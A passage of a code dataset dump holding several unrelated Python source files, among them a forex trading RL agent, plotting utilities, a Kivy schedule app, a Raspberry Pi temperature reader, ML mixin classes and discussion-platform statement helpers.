dif_to_action(diff):\n if diff < 0:\n return 0 # Sell\n elif diff == 0:\n return 1 # Stay\n else:\n return 2 # Buy\n\n\nclass FxEnv(TradeEnvironment):\n\n @classmethod\n def __reward__(self, state, action, state_t):\n if state_t is not None and state is not None:\n diff = state_t[:1] - state[:1]\n actual_action = dif_to_action(diff)\n if actual_action - action == 0:\n return 1\n else:\n return -1\n return 0\n\n\nclass FxTradeAgent(Agent):\n epsilon = 0.5\n epsilon_decay = 0.995\n train_agent = True\n\n 
@classmethod\n def after_init(self):\n self.sess = tf.Session()\n\n saver.restore(self.sess, model_path)\n # self.sess.run(init_op)\n file_writer = tf.summary.FileWriter(log_path, self.sess.graph)\n\n def get_policy_decision(self, state):\n if state is not None:\n state = np.reshape(state, (1, obs_length))\n return self.sess.run(sample_op, feed_dict={observations: state})\n return np.argmax(np.random.randint(1, 3, self.action_size))\n\n def act(self, state):\n # Act with epslion on traning process\n if self.train_agent is False:\n return self.get_policy_decision(state)\n else:\n if np.random.rand() >= self.epsilon:\n return self.get_policy_decision(state)\n else:\n return np.argmax(np.random.randint(1, 3, self.action_size))\n\n def after_memories(self, train_status):\n if train_status:\n self.epsilon = self.epsilon * self.epsilon_decay\n\n def replay(self, memories):\n\n for state_t_pre, action_t_pre, reward_t_pre, state_t, done in memories:\n # if action_t_pre !=0:\n # print(action_t_pre)\n\n action_t_pre = np.array(action_t_pre)\n reward_t_pre = np.array(reward_t_pre)\n state_t_pre = np.array(state_t_pre)\n # Reshape Inputs\n action_t_pre = np.reshape(action_t_pre, (1,))\n reward_t_pre = np.reshape(reward_t_pre, (1,))\n state_t_pre = np.reshape(state_t_pre, (1, state_t_pre.shape[0]))\n\n # print(state_t_pre, action_t_pre, reward_t_pre, state_t)\n\n feed_dict = {\n rewards: reward_t_pre,\n observations: state_t_pre,\n actions: action_t_pre\n }\n self.sess.run(train_op, feed_dict=feed_dict)\n\n saver.save(self.sess, save_path=model_path)\n\n with tf.name_scope('cross_entropy'):\n tf.summary.scalar('cross_entropy', cross_entropies)\n\n with tf.name_scope('accuracy'):\n with tf.name_scope('correct_prediction'):\n correct_prediction = tf.equal(tf.argmax(Y, 1), tf.argmax(Ylogits, 1))\n with tf.name_scope('accuracy'):\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('accuracy', accuracy)\n merged = tf.summary.merge_all()\n\n # file_writer = tf.summary.FileWriter(log_path, self.sess.graph)\n file_writer = tf.summary.FileWriter(log_path)\n\n\npair_name = \"EURUSD\"\ninterval = 1\n\nfuture_state = 4\nstate_size = 47\naction_size = 3\nconsidering_steps = 15\n\nrsi_range = [14]\ntsi_range = [14, 29, 58, 100]\nemi_range = [3, 89]\naroon_range = [3, 21, 89]\ndpo_range = [3, 21, 89]\n\nchunk_size = 2e4\n\nfx_agent = FxTradeAgent(max_length=20000)\n\ndata_frames = get_data_chunk(pair_name, interval,\n chunk_size=chunk_size)\n\nplayground_step = 0\n\nfor data_frame in data_frames:\n print(\"\\n----Start Processing Another Chunk of Data ----\")\n print(data_frame.head(1))\n print(data_frame.tail(1))\n print(\"----\")\n df = create_data_frame(data_frame,\n considering_steps=considering_steps,\n rsi_range=rsi_range,\n tsi_range=tsi_range,\n emi_range=emi_range,\n aroon_range=aroon_range,\n dpo_range=dpo_range)\n print(\"---Data Summary---\")\n print(df.head())\n print(df.tail())\n print(f\"Before Process {len(data_frame)}\")\n print(f\"After Process {len(df)}\")\n print(\"\\n\")\n fx_env = FxEnv(df.values)\n\n # print(state)\n pl = PlayGround(env=fx_env,\n agent=fx_agent,\n time_frame=1,\n playground_step=playground_step)\n pl.play()\n playground_step += 1\n","repo_name":"ceylon-ai-projects/data_stream_gym","sub_path":"trading_agent.py","file_name":"trading_agent.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"36572918209","text":"import sys\nimport os\n\nfrom 
setuptools import setup, find_packages\n\n# import version\n\nimport numpy\n\ninclude_dirs = [numpy.get_include()]\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"src\"))\n\npacks = find_packages(\"src\", include=[\"amulet*\"])\n\nprint(packs)\n\nsetup(\n    name=\"amulet\",\n    version=\"0.0.0\",\n    packages=packs,\n    package_dir={\"\": \"src\"},\n    include_dirs=include_dirs,\n    include_package_data=True,\n)\n","repo_name":"Amulet-Team/Amulet-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"69841067322","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\n\n\ndef plot_matrix(matrix, classes, x_label, y_label, save_to, ticks_rotation=45, show=False):\n    fig, ax = plt.subplots(1, 1)\n    sns.heatmap(matrix, annot=True, cmap='crest', fmt='d')\n    classes_indexes = classes.argsort()\n    classes_labels = classes.tolist()\n    ax.set_xticks(classes_indexes + 0.5)\n    ax.set_yticks(classes_indexes + 0.5)\n    ax.set_xticklabels(classes_labels, rotation=ticks_rotation, ha='left', rotation_mode='anchor')\n    ax.set_yticklabels(classes_labels, rotation=ticks_rotation, ha='left', rotation_mode='anchor')\n    ax.set_xlabel(x_label)\n    ax.set_ylabel(y_label)\n    plt.tight_layout()\n    plt.savefig(save_to, bbox_inches='tight', pad_inches=0.5, dpi=600)\n    if show:\n        plt.show()\n\n\ndef plot_roc(fpr, tpr, save_to, ticks_rotation=45, show=False):\n    fig, ax = plt.subplots(1, 1)\n    ax.set_title('Receiver Operating Characteristic')\n    # compute the AUC from the curve itself so the legend label carries a real\n    # value instead of the unfilled '%.2f' placeholder the original passed\n    auc = float(np.trapz(tpr, fpr))\n    ax.plot(fpr, tpr, label='AUC = %.2f' % auc)\n    ax.legend(loc='lower right')\n    ax.set_xlabel('False Positive Rate')\n    ax.set_ylabel('True Positive Rate')\n    plt.tight_layout()\n    plt.savefig(save_to, bbox_inches='tight', pad_inches=0.5, dpi=600)\n    if show:\n        plt.show()\n","repo_name":"sudrizzz/vbr","sub_path":"src/utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"19667322687","text":"import sys\r\nimport copy\r\ninput = sys.stdin.readline\r\nA, B, C, D, E, F, X = map(int, input().split())\r\none_X = copy.deepcopy(X)\r\ntwo_X = copy.deepcopy(X)\r\nans_A = 0\r\nans_B = 0\r\nwhile one_X > 0:\r\n    if one_X - A >= 0:\r\n        one_X -= (A + C)\r\n        ans_A += (B * A)\r\n    elif one_X < 0:\r\n        break\r\n    else:\r\n        ans_A += (B * one_X)\r\n        break\r\n\r\nwhile two_X > 0:\r\n    if two_X - D >= 0:  # fixed: the second player's check mistakenly reused A\r\n        two_X -= (D + F)\r\n        ans_B += (E * D)\r\n    elif two_X < 0:\r\n        break\r\n    else:\r\n        ans_B += (E * two_X)\r\n        break\r\nans = str()\r\nif ans_A > ans_B:\r\n    ans = 'Takahashi'\r\nelif ans_A < ans_B:\r\n    ans = 'Aoki'\r\nelse:\r\n    ans = 'Draw'\r\n\r\nprint(ans)\r\n","repo_name":"kazumasa-torii/atcoder","sub_path":"abc/249/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
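Tying into the plot_roc fix above: the AUC value placed in the legend can be recovered from the (fpr, tpr) samples themselves with the trapezoidal rule. A small self-contained check:

    import numpy as np

    fpr = np.array([0.0, 0.25, 0.5, 1.0])
    tpr = np.array([0.0, 0.7, 0.9, 1.0])
    auc = np.trapz(tpr, fpr)       # integrate tpr over fpr
    print('AUC = %.2f' % auc)      # -> AUC = 0.76 for this toy curve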
{"seq_id":"30720470822","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.label import Label\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.anchorlayout import AnchorLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.pagelayout import PageLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.textinput import TextInput\nfrom kivy.properties import StringProperty\nfrom kivy.properties import BooleanProperty\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.graphics.vertex_instructions import Rectangle\n\nimport dataTerm1\nimport dataTerm2\nimport dataTerm3\n\n# -----------------------------------------BORDER----------------------------------------- #\n\n\n\n\nclass TermsWidget(BoxLayout):\n    pass\nclass MainWindow(Screen):\n    pass\nclass Term1Window(Screen):\n    pass\nclass Term2Window(Screen):\n    pass\nclass Term3Window(Screen):\n    pass\nclass WindowManager(ScreenManager):\n    pass\nclass mymain(App):\n    pass\n\n# The original file spelled out one Screen subclass per term and week\n# (T1W1Window..T1W14Window, T2W1Window..T2W12Window, T3W1Window..T3W12Window),\n# each repeating the same four topic/host/presenter lookups.  The factory\n# below builds identical classes in a loop.  As in the original, the host and\n# presenter attributes of every year level point at the Y9 entries of the\n# data modules; only the topics differ per year.\ndef _make_week_screen(term, week, data_module):\n    attrs = {}\n    for year in (9, 8, 7, 6):\n        attrs['topicY%d' % year] = getattr(data_module, 'Y%dT%dtopic%d' % (year, term, week))\n        attrs['hostY%d' % year] = getattr(data_module, 'Y9T%dhost%d' % (term, week))\n        attrs['presenterY%d' % year] = getattr(data_module, 'Y9T%dpresenter%d' % (term, week))\n    return type('T%dW%dWindow' % (term, week), (Screen,), attrs)\n\n# Screen subclasses are registered with Kivy's Factory automatically by the\n# Widget metaclass, so the kv file can still reference T1W1Window etc. by name.\nfor _term, _weeks, _module in ((1, 14, dataTerm1), (2, 12, dataTerm2), (3, 12, dataTerm3)):\n    for _week in range(1, _weeks + 1):\n        _cls = _make_week_screen(_term, _week, _module)\n        globals()[_cls.__name__] = _cls\n\n\n\n\nkv = Builder.load_file(\"mymain.kv\")\n\n\nclass MyMainApp(App):\n    def build(self):\n        return kv\nif __name__ == \"__main__\":\n    MyMainApp().run()\n\n\n","repo_name":"MyGemsUsername/Kivy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"25539288717","text":"import numpy as np\nimport cPickle as pickle\nfrom scipy.interpolate import UnivariateSpline\nimport bbh_processing.hfile_tools as hfile\nimport bbh_processing.peak_finders as peak\nimport bbh_processing.equatorial_freq_methods as eqfreq\nimport bbh_processing.unwrap as unwrap\nimport matplotlib.pyplot as plt\n\ndef krph(time, data, N, Niter=1, trim=True, minidx=200):\n    ph_all = omega_phi_sliding(time, data, N, Niter=Niter, trim=trim,\n                               minidx=minidx, joined=True)\n    r_all = 
eqfreq.omega_r_sliding(time, data, N, Niter=Niter, trim=trim,\n minidx=minidx, joined=True)\n k_all = r_all[:, 1] / ph_all[:, 1] \n return k_all\n\ndef ks_equatorial(omtime, omdata, N, minidx=200):\n\n omph = eqfreq.omega_phi_sliding(omtime, omdata, N, minidx=minidx)\n omr = eqfreq.omega_r_sliding(omtime, omdata, N, minidx=minidx)\n pt, pv = peak.conservative_peaks(omtime, omdata, minidx=minidx)\n tt, tv = peak.conservative_peaks(omtime, omdata, minidx=minidx, pktype=\"trough\")\n ecc = eqfreq.ecc_sqrt(pt, pv, tt, tv, omph[:, 0])\n krph = omr[:, 1] / omph[:, 1]\n outdict = {\n \"time\": omph[:, 0], \"ecc\": ecc,\n \"omph\": omph[:, 1], \"omr\": omr[:, 1], \n \"krph\": krph}\n return outdict\n\ndef ks_inclined(omtime, omdata, thtime, thdata, N, minidx=200):\n pt, pv = peak.conservative_peaks(omtime, omdata, minidx=minidx)\n tt, tv = peak.conservative_peaks(omtime, omdata, minidx=minidx, pktype=\"trough\")\n omph = eqfreq.omega_phi_from_peaks(omtime, omdata, pt, pv, N)\n omr = eqfreq.omega_r_from_peaks(omtime, omdata, pt, N)\n omth = unwrap.omega_theta_from_peaks(thtime, thdata, pt, N=1)\n ecc = eqfreq.ecc_sqrt(pt, pv, tt, tv, omph[:, 0])\n krph = omr[:, 1] / omph[:, 1]\n krth = omr[:, 1] / omth[:, 1]\n kthph = omth[:, 1] / omph[:, 1]\n \n outdict = {\n \"time\": omph[:, 0], \"ecc\": ecc,\n \"omph\": omph[:, 1], \"omr\": omr[:, 1], \"omth\": omth[:, 1],\n \"krph\": krph, \"krth\": krth, \"kthph\": kthph}\n return outdict\n","repo_name":"alewis/bbh_processing","sub_path":"bbh_processing/precession_rates.py","file_name":"precession_rates.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36743020208","text":"#This Code was taken from this website to test the temperature of the Raspberry Pi Board:\n#https://medium.com/@kevalpatel2106/monitor-the-core-temperature-of-your-raspberry-pi-3ddfdf82989f\n\nimport os\nimport time\n\ndef measure_temp():\n temp = os.popen(\"vcgencmd measure_temp\").readline()\n return (temp.replace(\"temp=\",\"\"))\n\nwhile True:\n print(measure_temp())\n time.sleep(1)\n","repo_name":"Hackling92/ThePotato","sub_path":"Test_Code/Capstone_Project_GK/Temperature Indicator/GOTHC_013_Rev 1.0 Board Temperature Test.py","file_name":"GOTHC_013_Rev 1.0 Board Temperature Test.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70180008121","text":"import numpy as np\n\nfrom typing import *\nfrom abc import abstractmethod\nfrom abc import ABC\n\nfrom ..misc.toolkit import Metrics\n\n\nclass StrMixin:\n @property\n def name(self):\n return getattr(self, \"_name\", \"\")\n\n @property\n def kwargs(self):\n return getattr(self, \"_kwargs\", {})\n\n def __str__(self):\n if not self.kwargs:\n kwarg_str = \"\"\n else:\n kwarg_str = \"\\n\".join(\n [\" \" * 2 + f\"{k} : {v}\" for k, v in self.kwargs.items()]\n )\n kwarg_str = f\"\\n{{\\n{kwarg_str}\\n}}\"\n return f\"{type(self).__name__}({self.name}){kwarg_str}\"\n\n __repr__ = __str__\n\n\nclass NormalizeMixin(ABC):\n @property\n def std_eps(self):\n return 1e-8\n\n @property\n def normalize_labels(self):\n return getattr(self, \"_normalize_labels\", False)\n\n def _initialize_statistics(self, x: np.ndarray, y: np.ndarray):\n self._x_mean, self._x_std = x.mean(0), x.std(0)\n self._x_normalized = self.normalize_x(x)\n if not self.normalize_labels:\n self._y_normalized = y\n else:\n self._y_mean, self._y_std = y.mean(0), y.std(0)\n 
self._y_normalized = self.normalize_y(y)\n\n def normalize_x(self, x: np.ndarray) -> np.ndarray:\n return (x - self._x_mean) / (self._x_std + self.std_eps)\n\n def normalize_y(self, y: np.ndarray) -> np.ndarray:\n return (y - self._y_mean) / (self._y_std + self.std_eps)\n\n def recover_y(self, y_normalized: np.ndarray, *, in_place: bool = True):\n if not self.normalize_labels:\n return y_normalized\n if not in_place:\n y_normalized = y_normalized.copy()\n y_normalized *= self._y_std\n y_normalized += self._y_mean\n return y_normalized\n\n @abstractmethod\n def _predict_normalized(self, x: np.ndarray) -> np.ndarray:\n pass\n\n def predict_raw(self, x: np.ndarray) -> np.ndarray:\n predictions = self._predict_normalized(self.normalize_x(x))\n self.recover_y(predictions)\n return predictions\n\n\nclass BinaryClassifierMixin(ABC):\n @property\n def threshold(self):\n return getattr(self, \"_binary_threshold\", 0.5)\n\n @property\n def binary_metric(self):\n return getattr(self, \"_binary_metric\", \"acc\")\n\n @property\n def allow_multiclass(self):\n return getattr(self, \"_allow_multiclass\", False)\n\n def check_binary_classification(self, y: np.ndarray):\n num_classes = y.max() + 1\n if num_classes > 2:\n raise ValueError(\n f\"{type(self).__name__} only supports num_classes=2.\\n\"\n \"* For multi-class problems, please use NeuralNetwork instead\"\n )\n\n @staticmethod\n def _preprocess_data(x: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:\n return x, y\n\n def _generate_binary_threshold(self, x: np.ndarray, y: np.ndarray):\n probabilities = self.predict_prob(x)\n self._binary_threshold = Metrics.get_binary_threshold(\n y,\n probabilities,\n self.binary_metric,\n )\n\n @abstractmethod\n def predict_prob(self, x: np.ndarray) -> np.ndarray:\n pass\n\n @abstractmethod\n def _fit_core(self, x_processed: np.ndarray, y_processed: np.ndarray):\n pass\n\n def fit(self, x: np.ndarray, y: np.ndarray) -> \"BinaryClassifierMixin\":\n if not self.allow_multiclass:\n self.check_binary_classification(y)\n x_processed, y_processed = self._preprocess_data(x, y)\n self._fit_core(x_processed, y_processed)\n self._is_binary = False\n if not self.allow_multiclass or y_processed.shape[1] == 2:\n self._generate_binary_threshold(x, y)\n self._is_binary = True\n return self\n\n def predict(self, x: np.ndarray) -> np.ndarray:\n probabilities = self.predict_prob(x)\n if not self._is_binary:\n return probabilities.argmax(1).reshape([-1, 1])\n return (probabilities[..., 1] >= self.threshold).astype(int).reshape([-1, 1])\n\n\n__all__ = [\"StrMixin\", \"NormalizeMixin\", \"BinaryClassifierMixin\"]\n","repo_name":"carefree0910/carefree-ml","sub_path":"cfml/models/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"40"} +{"seq_id":"8681548210","text":"### Note:\n\n# What does this function do?: \n\n## Every Online consultation happening in Bangalore, Chennai, Hyderabad and Pune is not being recorded with a City name. \n## Instead they are being recorded with the City name \"Online\"\n## In this Code we try to map these \"Online\" entries to the corresponding city names based on the online consultation location.\n\n## Assumption: The person is from the same place as the Online consultation location suggests.\n\n## Example: A person living in Madurai can do online consultation with a doctor from Chennai. 
This gets recorded as \"Online consultation-Chennai\"\n# We assume the person is not from Madurai\n\nimport pandas as pd\nimport Apts_cities_mapping\n\ndef Online_cities_mapping():\n\n Apts = Apts_cities_mapping.Apts_cities_mapping()\n\n Apts_half1 = Apts[Apts.City!=\"Online\"]\n Apts_half2 = Apts[Apts.City==\"Online\"]\n\n Online_mapping = pd.read_csv(r\"D:\\Python\\Test\\Mapping\\Cities mapping\\Online_hospitals_mapping.csv\")\n\n Online_mapped = pd.merge(Apts_half2, Online_mapping, left_on = \"f2f_hospital\", right_on = \"Online_hospitals\", how = \"left\")\n\n Online_mapped = Online_mapped.drop(columns = [\"City_x\", \"Online_hospitals\"])\n\n Online_mapped.columns = ['Lead_id', 'f2f_doctor', 'f2f_hospital', 'f2f_sch_date', 'f2f_sch_time',\n 'f2f_comp_date', 'f2f_comp_time', 'Surgery_doctor', 'Surgery_hospital',\n 'Surgery_sch_date', 'Surgery_sch_time', 'Surgery_comp_date',\n 'Surgery_comp_time', 'Doctor_id', 'Hospital_id', 'Service', 'Owner',\n 'Lead_src', 'Status', 'Surgeon_id', 'Surg_hospital_id',\n 'Surgery_amount', 'Insurance_amount', 'Copay_amount', 'Cash_amount',\n 'Discount', 'Final_amount', 'Dept', 'Surgery_required_date',\n 'Surgery_required_time', 'Call_src','City']\n \n Apts_online_mapped = pd.concat([Apts_half1, Online_mapped], axis = 0, ignore_index = True)\n\n return Apts_online_mapped\n\n\n\n\n","repo_name":"krishnaRkishore/Marketing_Analytics","sub_path":"Codes/Online_cities_mapping.py","file_name":"Online_cities_mapping.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10473072009","text":"# coding=utf-8\nfrom os import environ\nfrom typing import List, Tuple, Dict, Union, Any\n\nimport transaction\nfrom sqlalchemy import func\n\nimport dbas.review.helper.queues as review_queue_helper\nfrom dbas.database import DBDiscussionSession\nfrom dbas.database.discussion_model import Issue, User, Statement, TextVersion, MarkedStatement, \\\n sql_timestamp_pretty_print, Argument, Premise, PremiseGroup, SeenStatement\nfrom dbas.handler import user, notification as nh\nfrom dbas.handler.rss import append_action_to_issue_rss\nfrom dbas.handler.voting import add_seen_argument, add_seen_statement\nfrom dbas.helper.relation import set_new_undermine_or_support_for_pgroup, set_new_support, set_new_undercut, \\\n set_new_rebut\nfrom dbas.helper.url import UrlManager\nfrom dbas.input_validator import is_integer\nfrom dbas.lib import get_text_for_statement_uid, get_profile_picture, escape_string, get_text_for_argument_uid, \\\n Relations, Attitudes\nfrom dbas.logger import logger\nfrom dbas.review.helper.reputation import add_reputation_for, rep_reason_first_position, \\\n rep_reason_first_justification, rep_reason_new_statement\nfrom dbas.strings.keywords import Keywords as _\nfrom dbas.strings.translator import Translator\nfrom websocket.lib import send_request_for_info_popup_to_socketio\n\n\ndef set_position(db_user: User, db_issue: Issue, statement_text: str) -> dict:\n \"\"\"\n Set new position for current discussion and returns collection with the next url for the discussion.\n\n :param statement_text: The text of the new position statement.\n :param db_issue: The issue which gets the new position\n :param db_user: The user who sets the new position.\n :rtype: dict\n :return: Prepared collection with statement_uids of the new positions and next url or an error\n \"\"\"\n logger('StatementsHelper', statement_text)\n\n user.update_last_action(db_user)\n\n new_statement = 
insert_as_statement(statement_text, db_user, db_issue, is_start=True)\n\n _um = UrlManager(db_issue.slug)\n url = _um.get_url_for_statement_attitude(new_statement.uid)\n add_rep, broke_limit = add_reputation_for(db_user, rep_reason_first_position)\n if not add_rep:\n add_rep, broke_limit = add_reputation_for(db_user, rep_reason_new_statement)\n # send message if the user is now able to review\n if broke_limit:\n url += '#access-review'\n\n return {\n 'status': 'success',\n 'url': url,\n 'statement_uids': [new_statement.uid],\n 'error': ''\n }\n\n\ndef set_positions_premise(db_issue: Issue, db_user: User, db_conclusion: Statement, premisegroups: List[List[str]],\n supportive: bool, history: str, mailer) -> dict:\n \"\"\"\n Sets a new premise for a given position and returns a dictionary with the url for the next step of the discussion\n\n :param mailer:\n :param history:\n :param supportive:\n :param premisegroups:\n :param db_conclusion:\n :param db_user:\n :param db_issue:\n :rtype: dict\n :return: Prepared collection with statement_uids of the new premises and an url or an error\n \"\"\"\n user.update_last_action(db_user)\n\n prepared_dict = __process_input_of_start_premises(premisegroups, db_conclusion, supportive, db_issue, db_user)\n if prepared_dict['error']:\n return prepared_dict\n\n __set_url_of_start_premises(prepared_dict, db_conclusion, supportive, db_issue, db_user, history, mailer)\n __add_reputation(db_user, db_issue, prepared_dict['url'], prepared_dict)\n\n return prepared_dict\n\n\ndef __add_reputation(db_user: User, db_issue: Issue, url: str, prepared_dict: dict):\n \"\"\"\n\n :param db_user:\n :param db_issue:\n :param url:\n :param prepared_dict:\n :return:\n \"\"\"\n add_rep, broke_limit = add_reputation_for(db_user, rep_reason_first_justification)\n if not add_rep:\n add_rep, broke_limit = add_reputation_for(db_user, rep_reason_new_statement)\n # send message if the user is now able to review\n if broke_limit:\n _t = Translator(db_issue.lang)\n send_request_for_info_popup_to_socketio(db_user.nickname, _t.get(_.youAreAbleToReviewNow), '/review')\n prepared_dict['url'] = '{}{}'.format(url, '#access-review')\n\n\ndef set_correction_of_statement(elements, db_user, translator) -> dict:\n \"\"\"\n Adds a proposal for a statement's correction and returns info if the proposal could be set\n\n :param elements: List of dicts with text and uids for proposals of edits for new statements\n :param db_user: User\n :param translator: Translator\n :rtype: dict\n :return: Dictionary with info and/or error\n \"\"\"\n prepared_dict = dict()\n db_user.update_last_action()\n\n msg, error = review_queue_helper.add_proposals_for_statement_corrections(elements, db_user, translator)\n prepared_dict['error'] = msg if error else ''\n prepared_dict['info'] = msg if len(msg) > 0 else ''\n\n return prepared_dict\n\n\ndef set_seen_statements(uids, path, db_user) -> dict:\n \"\"\"\n Marks several statements as already seen.\n\n :param uids: Uids of statements which should be marked as seen\n :param path: Current path of the user\n :param db_user: User\n :rtype: dict\n :return: Dictionary with an error field\n \"\"\"\n # are the statements connected to an argument?\n if 'justify' in path:\n url = path[path.index('justify/') + len('justify/'):]\n additional_argument = int(url[:url.index('/')])\n add_seen_argument(additional_argument, db_user)\n\n for uid in uids:\n # we get the premise group id's only\n if is_integer(uid):\n add_seen_statement(uid, db_user)\n return {'status': 'success'}\n\n\ndef 
correct_statement(db_user, uid, corrected_text):\n \"\"\"\n Corrects a statement\n\n :param db_user: User requesting user\n :param uid: requested statement uid\n :param corrected_text: new text\n :return: dict()\n \"\"\"\n logger('StatementsHelper', 'def ' + str(uid))\n\n while corrected_text.endswith(('.', '?', '!')):\n corrected_text = corrected_text[:-1]\n\n # duplicate check\n return_dict = dict()\n db_statement = DBDiscussionSession.query(Statement).get(uid)\n db_textversion = DBDiscussionSession.query(TextVersion).filter_by(content=corrected_text).order_by(\n TextVersion.uid.desc()).all()\n\n # not a duplicate?\n if not db_textversion:\n textversion = TextVersion(content=corrected_text, author=db_user.uid)\n textversion.set_statement(db_statement.uid)\n DBDiscussionSession.add(textversion)\n DBDiscussionSession.flush()\n\n # if request:\n # nh.send_edit_text_notification(db_user, textversion, url, request)\n\n # transaction.commit() # # 207\n\n return_dict['uid'] = uid\n return_dict['text'] = corrected_text\n return return_dict\n\n\ndef get_logfile_for_statements(uids, lang, main_page):\n \"\"\"\n Returns the logfile for the given statement uid\n\n :param uids: requested statement uid\n :param lang: ui_locales ui_locales\n :param main_page: URL\n :return: dictionary with the logfile-rows\n \"\"\"\n logger('StatementsHelper', 'def with uid: ' + str(uids))\n\n main_dict = dict()\n for uid in uids:\n db_textversions = DBDiscussionSession.query(TextVersion).filter_by(statement_uid=uid).order_by(\n TextVersion.uid.asc()).all() # TODO #432\n if len(db_textversions) == 0:\n continue\n return_dict = dict()\n content_dict = dict()\n # add all corrections\n for index, version in enumerate(db_textversions):\n content_dict[str(index)] = __get_logfile_dict(version, main_page, lang)\n return_dict['content'] = content_dict\n main_dict[get_text_for_statement_uid(uid)] = return_dict\n\n return main_dict\n\n\ndef __get_logfile_dict(textversion: TextVersion, main_page: str, lang: str) -> Dict:\n \"\"\"\n Returns dictionary with information about the given textversion\n\n :param textversion: TextVersion\n :param main_page: String\n :param lang: Language.ui_locales\n :return: dict()\n \"\"\"\n db_author = DBDiscussionSession.query(User).get(textversion.author_uid)\n corr_dict = dict()\n corr_dict['uid'] = str(textversion.uid)\n corr_dict['author'] = str(db_author.global_nickname)\n corr_dict['author_url'] = main_page + '/user/' + str(db_author.uid)\n corr_dict['author_gravatar'] = get_profile_picture(db_author, 20)\n corr_dict['date'] = sql_timestamp_pretty_print(textversion.timestamp, lang)\n corr_dict['text'] = str(textversion.content)\n return corr_dict\n\n\ndef insert_as_statement(text: str, db_user: User, db_issue: Issue, is_start=False) -> Statement:\n \"\"\"\n Inserts the given text as statement and returns the uid\n\n :param text: String\n :param db_user: User\n :param db_issue: Issue\n :param is_start: Boolean\n :return: Statement\n \"\"\"\n new_statement, is_duplicate = set_statement(text, db_user, is_start, db_issue)\n\n # add marked statement\n DBDiscussionSession.add(MarkedStatement(statement=new_statement.uid, user=db_user.uid))\n DBDiscussionSession.add(SeenStatement(statement_uid=new_statement.uid, user_uid=db_user.uid))\n DBDiscussionSession.flush()\n\n _tn = Translator(db_issue.lang)\n _um = UrlManager(db_issue.slug)\n append_action_to_issue_rss(db_issue=db_issue, db_author=db_user,\n title=_tn.get(_.positionAdded if is_start else _.statementAdded),\n description='...' 
+ get_text_for_statement_uid(new_statement.uid) + '...',\n url=_um.get_url_for_statement_attitude(new_statement.uid))\n\n return new_statement\n\n\ndef set_statement(text: str, db_user: User, is_start: bool, db_issue: Issue) -> Tuple[Statement, bool]:\n \"\"\"\n Saves statement for user\n\n :param text: given statement\n :param db_user: User of given user\n :param is_start: if it is a start statement\n :param db_issue: Issue\n :return: Statement, is_duplicate or -1, False on error\n \"\"\"\n\n logger('StatementsHelper', 'user: ' + str(db_user.nickname) + ', user_id: ' + str(db_user.uid) +\n ', text: ' + str(text) + ', issue: ' + str(db_issue.uid))\n\n # escaping and cleaning\n text = text.strip()\n text = ' '.join(text.split())\n text = escape_string(text)\n _tn = Translator(db_issue.lang)\n if text.startswith(_tn.get(_.because).lower() + ' '):\n text = text[len(_tn.get(_.because) + ' '):]\n while text.endswith(('.', '?', '!', ',')):\n text = text[:-1]\n\n # check, if the text already exists\n db_duplicate = DBDiscussionSession.query(TextVersion).filter(\n func.lower(TextVersion.content) == text.lower()).first()\n if db_duplicate:\n db_statement = DBDiscussionSession.query(Statement).filter(Statement.uid == db_duplicate.statement_uid,\n Statement.issue_uid == db_issue.uid).one()\n return db_statement, True\n\n # add text\n statement = Statement(is_position=is_start, issue=db_issue.uid)\n DBDiscussionSession.add(statement)\n DBDiscussionSession.flush()\n\n # add textversion\n textversion = TextVersion(content=text, author=db_user.uid, statement_uid=statement.uid)\n DBDiscussionSession.add(textversion)\n DBDiscussionSession.flush()\n\n transaction.commit()\n return statement, False\n\n\ndef __is_conclusion_in_premisegroups(premisegroups: list, db_conclusion: Statement) -> bool:\n for premisegroup in premisegroups:\n if any([db_conclusion.get_textversion().content.lower() in pg.lower() for pg in premisegroup]):\n return True\n return False\n\n\ndef __process_input_of_start_premises(premisegroups, db_conclusion: Statement, supportive, db_issue: Issue,\n db_user: User) -> Dict[str, Any]:\n \"\"\"\n Inserts premises of groups as new arguments in dependence of the input parameters and returns a URL for forwarding.\n\n :param premisegroups: [[String, ..], ...]\n :param db_conclusion: Statement\n :param supportive: Boolean\n :param db_issue: Issue\n :param db_user: User\n :return: URL, [Statement.uid], String\n \"\"\"\n logger('StatementsHelper', '__process_input_of_start_premises: {}'.format(len(premisegroups)))\n _tn = Translator(db_issue.lang)\n\n # insert all premise groups into our database\n # all new arguments are collected in a list\n new_argument_uids = []\n new_statement_uids = [] # all statement uids are stored in this 